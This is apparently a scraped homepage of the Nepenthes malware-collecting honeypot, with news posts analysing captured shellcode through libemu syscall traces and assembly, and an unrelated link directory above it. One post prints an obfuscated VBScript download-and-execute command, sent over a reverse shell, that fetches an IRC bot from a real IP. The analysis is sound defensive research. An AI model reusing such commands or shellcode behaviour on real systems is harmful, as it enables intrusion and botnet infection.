| Related sites for http://nepenthes.mwcollect.org/ |
| InteractiveTHEATRE Online webisodic programming for audiences and advertisers. Our goal is have our content syndicated on the major entertainment destination sites. | | Computer_Associates__Clipper_forum_at_Tek-Tips Clipper technical support forums and mutual help system for computer professionals. | | ISoft Provides tools to find out the vital information from your data. | | Bus-Tech Manufactures and markets mainframe connectivity and data movement products, both under their own brand name and as an OEM. | | Emagine_International Customer retention and value enhancement solutions. Value management consulting, churn reduction strategies, and retention systems design and creation. | | JTemporal A framework of components providing functionality for time related applications (for the moment instant, period, mediators managing temporal associations). [Open source, LGPL] | | RFC_1667 Modeling and Simulation Requirements for IPng. S. Symington, D. Wood, M. Pullen. August 1994. | | RFC_2239 Definitions of Managed Objects for IEEE 802.3 Medium Attachment Units (MAUs) Using SMIv2. K. de Graaf, D. Romascanu, D. McMaster, et al. November 1997. | | Umbrello_UML_Modeller An UML modeling tool for KDE. It supports most UML diagrams, code export (C++ and Java) and reverse engineering. [Open Source, GPL] | | Dunfield_Development_Systems Makers of freeware Micro-C compiler for DOS. | | Coco/R_compiler_generator Coco/R combines the functionality of the well-known UNIX tools lex and yacc, to form an extremely easy to use compiler generator that generates recursive descent parsers, their associated scanners, an | | Pctechnicians_Canada Providing free IT tutorials for professionals and novice users. Guides on setting up workgroup networks, wireless, VPN, ICS, NAT, IIS, and terminal servers. | | Introduction_to_OOP_in_Simula By J.Sklenar. Document is based on an IT seminar called 30 Years of Object Oriented Programming (OOP) held at the University of Malta on 5/12/1997. | | Ms__Chloe\'s_Stuff Musical greeting cards, with categories including holidays, general and hummingbirds. | | Mathemania Is a virtual work-surface, which allows you to solve algebraic problems with the ease of drag and drop manipulations. [Win95/98/Me/NT/2000] | | Q&A__Behind_the_Story_at_JBoss Marc Fleury explains his vision for JBoss software, which he says will displace commercial Java server software faster than Linux is replacing more entrenched OSs. [ZDNet UK] (April 1, 2003) | | Bernard,_Teresa_-_Bluemoon Offers web and graphics design, promotion, and domain registration for visual artists. | | Hitec A document class designed to be used in place of 'article', when a hi-tech business (rather than academic) style is required. Includes documentation and file download. | | Jimmy\'s_Value_World Web development, software development, and e-commerce. | | Construxi Offers design, promotion, and eCommerce assistance solutions provider. |
|
home [Nepenthes - finest collection -] var alertText = 'Please enter the text you want to format.\nIt will be appended to the end of the document.' var notSavedYet = 'There are unsaved changes, that will be lost.\nReally continue?' var DOKU_BASE = '/'  nepenthes Download Documentation Mailing-Lists Development Bugs Subversion Patches Shellcodes Snippets Scene Statistics Papers and News Service Sample Analysis Virus Removal Help Misc Links Contact  [[home]] Nepenthes - finest collection - Trace: home » home Nepenthes - finest collection - Welcome to the official nepenthes website! Nepenthes is a versatile tool to collect malware. It acts passively by emulating known vulnerabilities and downloading malware trying to exploit these vulnerabilities. Interested? Check our documentation and grab your copy. July 21st 2008 the nanny at work This is the list of system calls from the famous linkbot connectback filetransfer shellcode. I only transfer’d some bytes so it does not get too long.HMODULE LoadLibraryA ( LPCTSTR lpFileName = 0x0012fe90 => = "ws2_32";) = 0x71a10000;SOCKET socket ( int af = 2; int type = 1; int protocol = 0;) = 3;int connect ( SOCKET s = 3; struct sockaddr_in * name = 0x0012fc80 => struct = { short sin_family = 2; unsigned short sin_port = 6460 (port=15385); struct in_addr sin_addr = { unsigned long s_addr = -19321026 (host=62.47.217.254); }; char sin_zero = " "; }; int namelen = 16;) = 0;int recv ( SOCKET s = 3; char * buf = 0x0012fc90 => none; int len = 512; int flags = 0;) = 512;HMODULE LoadLibraryA ( LPCTSTR lpFileName = 0x0012fa58 => = "ws2_32";) = 0x71a10000;int send ( SOCKET s = 3; const char * buf = 0x0012fc60 => = ".binary." (4 bytes); int len = 4; int flags = 0;) = 4;HANDLE CreateFile ( LPCTSTR lpFileName = 0x0012fd38 => = "iplf.exe"; DWORD dwDesiredAccess = -1073741824; DWORD dwShareMode = 0; LPSECURITY_ATTRIBUTES lpSecurityAttributes = 0x00000000 => none; DWORD dwCreationDisposition = 1; DWORD dwFlagsAndAttributes = 2; HANDLE hTemplateFile = 0;) = 134989584;int recv ( SOCKET s = 3; char * buf = 0x0012fa60 => none; int len = 512; int flags = 0;) = 380;BOOL WriteFile ( HANDLE hFile = 134989584; LPCVOID lpBuffer = 0x0012fa60 => = ".binary." (380 bytes); DWORD nNumberOfBytesToWrite = 380; LPDWORD lpNumberOfBytesWritten = 0x0012fc70 => none; LPOVERLAPPED lpOverlapped = 0x00000000 => none;) = 1;int recv ( SOCKET s = 3; char * buf = 0x0012fa60 => none; int len = 512; int flags = 0;) = 0;BOOL CloseHandle ( HANDLE hObject = 134989584;) = 0;BOOL CreateProcess ( LPCWSTR pszImageName = 0x0012fd38 => = "iplf.exe"; LPCWSTR pszCmdLine = 0x00000000 => = ""; LPSECURITY_ATTRIBUTES psaProcess = 0x00000000 => none; LPSECURITY_ATTRIBUTES psaThread = 0x00000000 => none; BOOL fInheritHandles = 0; DWORD fdwCreate = 0; LPVOID pvEnvironment = 0x00000000 => none; LPWSTR pszCurDir = 0x00000000 => none; struct LPSTARTUPINFOW psiStartInfo = 0x0012fa14 => struct = { DWORD cb = 68; LPTSTR lpReserved = 0; LPTSTR lpDesktop = 0; LPTSTR lpTitle = 0; DWORD dwX = 0; DWORD dwY = 0; DWORD dwXSize = 0; DWORD dwYSize = 0; DWORD dwXCountChars = 0; DWORD dwYCountChars = 0; DWORD dwFillAttribute = 0; DWORD dwFlags = 0; WORD wShowWindow = 0; WORD cbReserved2 = 0; LPBYTE lpReserved2 = 0; HANDLE hStdInput = 0; HANDLE hStdOutput = 0; HANDLE hStdError = 0; }; struct PROCESS_INFORMATION pProcInfo = 0x0052f74c => struct = { HANDLE hProcess = 4711; HANDLE hThread = 4712; DWORD dwProcessId = 4713; DWORD dwThreadId = 4714; };) = 1;DWORD WaitForSingleObject ( HANDLE hHandle = 4713; DWORD dwMilliseconds = 256;) = 0;BOOL CloseHandle ( HANDLE hObject = 134989584;) = 0;ERROR DeleteFile ( LPCTSTR lpFileName = 0x0012fd38 => none;) = -1;int closesocket ( SOCKET s = 3;) = 0;void ExitThread ( DWORD dwExitCode = 4714;) = 0;Obviously the shellcode works in the wild, but nevertheless, the shellcode is buggy. After the connection streaming the file got shut down (recv() = 0), the file handle is closed (CloseHandle(134989584)), after executing the file, the file handle gets closed again (CloseHandle(134989584)).If you fclose() a file twice on linux, the second call will segfault, as the memory access’d for the second fclose() is already free()’d. Therefore we need a nanny, verifying we do not close files twice.I just added some nanny code to subversion to deal with it in the sctest utility. Now, the shellcode runs fine again in sctest, closing the same handle twice just gives the warning shellcode tried to close not existing handle (maybe closed it already?) to the console. July 19th 2008 nepenthes & libemu Spent some time on writing a libemu module for nepenthes last months, turned out to be rather difficult as nepenthes is a single threaded program and shellcode emulation is slow and may require creating new processes. Installing software with a broken Makefile ran rm -rf / (yes, as root) on my system, therefore this effort got lost anyway. honeytrap is more likely to get working shellcode emulation than nepenthes, is multiple processes structure fits exactly the needs.But even if you do not have to worry about creating (sub)processes, emulating shellcodes is not easy. Most shellcode is written as fire&forget, if the shellcode works, be glad, if it does not work, do not care about the attacked host.For example relying on returnvalues from system calls to create arguments on the stack, without verification. In this case, the shellcode relied on the returnvalue of connect, and used it to create the length parameter for the recv syscall.HMODULE LoadLibraryA ( LPCTSTR lpFileName = 0x0012fe90 => = "ws2_32";) = 0x71a10000;SOCKET socket ( int af = 2; int type = 1; int protocol = 0;) = 3;int connect ( SOCKET s = 3; struct sockaddr_in * name = 0x0012fc80 => struct = { short sin_family = 2; unsigned short sin_port = 6460 (port=15385); struct in_addr sin_addr = { unsigned long s_addr = removed (host=removed); }; char sin_zero = " "; }; int namelen = 16;) = -1;int recv ( SOCKET s = 3; char * buf = 0x0012fc90 => none; int len = -64769; int flags = -1;) = -1; If the connect failed, recv got called with a negative signed value (-64769) for the buffer size and the flags (-1).In other cases, shellcode misbehaves, for example it tries to connect the attacker forever - if the host is unreachable. while ( connect(...) );Not to mention shellcode is very hard to write and as error prone any other software, but once it works, it gets deployed.This shellcode wants to connect() to a remotehost, but the namelen parameter is incorrect.int connect ( SOCKET s = 3; struct sockaddr_in * name = 0x0041728a => struct = { short sin_family = 2; unsigned short sin_port = 7470 (port=11805); struct in_addr sin_addr = { unsigned long s_addr = 1982129222 (host=70.228.36.118); }; char sin_zero = " "; }; int namelen = 4289293;) = 0;Looking at the assembly reveals the problem is a typo lea edx,[ebx+0x17f]mov byte [edx],0x16push edx ; push namelenlea edx,[ebx+0xfc]mov word [edx],0x2 mov di,[ebx+0x8]mov [edx+0x2],dimov edi,[ebx+0x4]mov [edx+0x4],edipush edx ; push sockaddr *mov eax,[ebx+0xf8]push eax ; push socketcall ds:[ebx+0x49] ; call connect(socket, sockaddr *, namelen)As only the namelen is wrong, we can focus on the first lines.mov byte [edx],0x16push edx ; push namelenThis code stores 0×16 at memory address [edx], and pushes the memory address on the stack, instead of the value 0×16, which would be the appropriate value for namelen on win32. Unfortunately this code works, at least on windows, else the worm (in this case the shellcode is csend from agobot) would not have had that impact and media attention in the past. If you emulate it on linux, you have to sanatize the namelen argument.Another point is, if we emulate code, we allow others to execute code on our boxes in a sandbox environment. Even though SQLSlammer has shown it is possible to write viral shellcode, current shellcode only helps getting access to a machine for further actions, shellcode (tcp)scanning for vulnerable hosts exploiting them is possible and therefore we have to think about it.One approach is profile the shellcode, execute it in a close sandbox, without proxying the syscalls to the host operating system, create a graph of the syscalls, measure the graph afterwards, guessing what the shellcode might want to do. This simple finite-state graphs and a path matching scheme to determine the behavior of them shellcode approach is outlined in ShellShock: Capturing Multi-Stage Attacks in Virtual Honeypots by Ryan Smith, Adam Prigden, Braxton Thomason, Vitaly Shmatikov, but the paper is not public available. One drawback with this approch is shellcode with more than one stage, as we can not profile the second stage, as the shellcode did not receive it in its closed sandbox.So, whats left? Current idea is implementing a nanny for shellcode to make sure it behaves during interactive emulation, we’ll see if it works out. February 14th 2008 nepenthes 0.2.2 release - happy valentines day Grab your copy from Sourceforge. November 7th 2007 As a variety from usual news, today: german politics. war on errorism On friday the 9th November 2007 the german goverment will decide about new laws to protect the civilians from terror attacks. The new laws include: telecommunication service providers including mobilservice and internet have to save number of the caller and callee start & end time of any call including timezone type of service in case of mobile services international number of caller and callee imsi identification of the mobiledevices of caller and callee the radio cell for caller and callee when starting the call in case of anonymous services, service activation time, radio cell in case of voip services, the ip address same rules apply for short and multimedia message services, including the time when the messages were sent and received email service providers when sending an email, email and ip address of the sender as well as the email address of the receipent when receiving email, the ip address of the sending “device”, the senders and receivers email address on access of a email box, the ip address of the accessor timestamps for all previous mentioned points including timezones internet service providers the users ip address unique identifier of the access point the sessions start and endtime, including the timezones providers of anonymization services save each ip session providers of mobile services save the radio cells identifier to allow geographical locating for six months In short, all communication signatures get stored for half a year, because everybody is a suspect, a potential terrorist, the goverment has to keep track of. TL;DR As usual, once the data is available, we are talking about 40 petabytes for only one major provider, there will be requests to use it, it is expensive to record, so better use it somehow if you fail catching terrorists. The Intellectual Property Economy would definitely love accessing the database, allowing them to sue software pirates in realtime. You could get a call you have to pay some thousand for copyright infringement even before the damn mp3 finished. Marketing, 100% transparent customers, the more you know about the stingy customers, the better you can promote your products. Improve press, remove whistelblowers, you got their communication signature in your records. Going to prison for controversy opinions gets possible again.This surveillance act suspects every civilian of being terrorist, to protect the democracy. Whats left of a democracy if it starts monitoring the whole population? Even though there was no successful act of terrorism in germany during the last 20 years, terrorism won, the democracy lost when removing its cornerstone to protect itself of terrorism. trust no government until history has proven you wrong On the other hand, there is still no public available data which congressman is paid as a lobbyist, and congressman are on the exception list for all surveillance actions. It’s somehow part of human nature to proof power corrupts once you have it. September 19th 2007 libemu 0.1.0 release Click this link to enter the libemu homepage, download your copy, and enjoy the first open source shellcode detection engine using emulation. It has been a lot of work, it took a lot of time and it is not complete yet, libemu based detection modules for honeytrap, nepenthes and snort are still todo. In the meantime you can enjoy the great shellcode detection commandline utility sctest to detect and profile shellcodes in suspicious dumps and create graphs of it. August 24th 2007 Trend Micro ServerProtect The Internet Stormcenter recently published a call for packets and asked for a shellcode analysis. We received the dump from the incidents handler William Salusky and here is the libemu result: the shellcodes graphThe shellcode spawns a command prompt and connects this shell to 219.150.93.35 10000. the commands from the remote server The server sends cd wins & ECHO SEt P=cREAtEOBjEct("micROSOFt.xmL"^&X^&"http"):P.OpEn "gEt",wScRipt.ARgUmEntS(0),0:P.SEnd():SEt S=cREAtEOBjEct("AdOdB.S"^&X^&"tREAm"):S.mOdE=3:S.tYpE=1:S.OpEn():S.wRitE(P.RESpOnSEBOdY):S.SAvEtOFiLE wScRipt.ARgUmEntS(1),2 >lite.vbecmd.exe /c "cscript.exe lite.vbe http://61.129.112.73/images/menu/dnz.dll dnz.dll & rundll32 dnz.dll,ShellMain"which gets executed by the attacked client. Removing the obfuscation, a file is downloaded from 61.129.112.73/images/menu/dnz.dll and stored as dnz.dll, which gets started by rundll32. the downloaded file The file is an irc bot with very bad detection rates as of the virustotal run yesterday evening:File dnz.dll received on 08.23.2007 21:05:21 (CET) Result: 4/32 (12.5%) Antivirus Version Last Update Result AhnLab-V3 2007.8.22.0 2007.08.23 - AntiVir 7.4.1.63 2007.08.23 - Authentium 4.93.8 2007.08.23 - Avast 4.7.1029.0 2007.08.23 - AVG 7.5.0.484 2007.08.23 BackDoor.Ircbot.BAO BitDefender 7.2 2007.08.23 - CAT-QuickHeal 9.00 2007.08.23 - ClamAV 0.91 2007.08.23 - DrWeb 4.33 2007.08.23 - eSafe 7.0.15.0 2007.08.23 - eTrust-Vet 31.1.5082 2007.08.23 - Ewido 4.0 2007.08.23 - FileAdvisor 1 2007.08.23 - Fortinet 2.91.0.0 2007.08.23 - F-Prot 4.3.2.48 2007.08.23 - F-Secure 6.70.13030.0 2007.08.23 - Ikarus T 3.1.1.12 2007.08.23 - Kaspersky 4.0.2.24 2007.08.23 - McAfee 5104 2007.08.23 - Microsoft 1.2803 2007.08.23 - NOD32v2 2480 2007.08.23 probably a variant of Win32/IRCBot Norman 5.80.02 2007.08.23 - Panda 9.0.0.4 2007.08.23 - Prevx1 V2 2007.08.23 - Rising 19.37.32.00 2007.08.23 - Sophos 4.20.0 2007.08.23 - Sunbelt 2.2.907.0 2007.08.23 - Symantec 10 2007.08.23 - TheHacker 6.1.8.172 2007.08.23 - VBA32 3.12.2.3 2007.08.23 suspected of Backdoor.xBot.3 VirusBuster 4.3.26:9 2007.08.23 - Webwasher-Gateway 6.0.1 2007.08.23 Win32.Malware.gen!92 (suspicious) Additional information File size: 24064 bytes MD5: 60cad46ccc51fefbadd1d0874c1c26d2 SHA1: 1db02d6916122cc3065b86786c2a25a5eebd1af3 the advise Apply patches in time, always. the nasty shellcode details For the completeness, here are the detailscat session_8016.5168.raw2 | /opt/libemu/bin/sctest -S -g -s 100000000-G dox.dotgraph file dox.dotsuccessHook me Captain Cook!environment/win32/emu_env_w32_dll_export_kernel32_hooks.c:661emu_env_w32_hook_LoadLibrayAHook me Captain Cook!environment/win32/emu_env_w32_dll_export_ws2_32_hooks.c:517emu_env_w32_hook_WSAStartupWSAStartup version 2Hook me Captain Cook!environment/win32/emu_env_w32_dll_export_ws2_32_hooks.c:461emu_env_w32_hook_WSASocketASOCKET WSASocket(af=2, type=1, protocol=0, lpProtocolInfo=0, group=0,dwFlags=0);socket 3Hook me Captain Cook!environment/win32/emu_env_w32_dll_export_ws2_32_hooks.c:182emu_env_w32_hook_connecthost 219.150.93.35 port 10000Hook me Captain Cook!environment/win32/emu_env_w32_dll_export_kernel32_hooks.c:134emu_env_w32_hook_CreateProcessACreateProcessACreateProcess(pszImageName=0, pszCmdLine=22cc80, psaProcess=0,psaThread=0, fInheritHandles=1, fdwCreate=0, pvEnvironment=0,pszCurDir=0, psiStartInfo=22cc2c, pProcInfo=22cc70)PROCESS_INFORMATION{ HANDLE hProcess=4711; HANDLE hThread=4712; DWORD dwProcessId=4713; DWORD dwThreadId=4714;}STARTUPINFO { DWORD cb=68; LPTSTR lpReserved=0x00000000; LPTSTR lpDesktop=0x00000000; LPTSTR lpTitle=0x00000000; DWORD dwX=0; DWORD dwY=0; DWORD dwXSize=0; DWORD dwYSize=0; DWORD dwXCountChars=0; DWORD dwYCountChars=0; DWORD dwFillAttribute=0; DWORD dwFlags=257; WORD wShowWindow=0; WORD cbReserved2=0; LPBYTE lpReserved2=0x080; HANDLE hStdInput=3; HANDLE hStdOutput=3; HANDLE hStdError=3;}Hook me Captain Cook!environment/win32/emu_env_w32_dll_export_kernel32_hooks.c:815emu_env_w32_hook_WaitForSingleObjectWaitForSingleObject(hHandle=17920, dwMilliseconds=-1)Hook me Captain Cook!environment/win32/emu_env_w32_dll_export_ws2_32_hooks.c:152emu_env_w32_hook_closesocketHook me Captain Cook!environment/win32/emu_env_w32_dll_export_kernel32_hooks.c:789emu_env_w32_hook_SetUnhandledExceptionFilterException filter 7c800000cpu error error accessing 0x7c81cdc7 not mapped News Archvie Older news can be found in the news archive. home.txt · Last modified: 2008/07/21 01:14        |
|
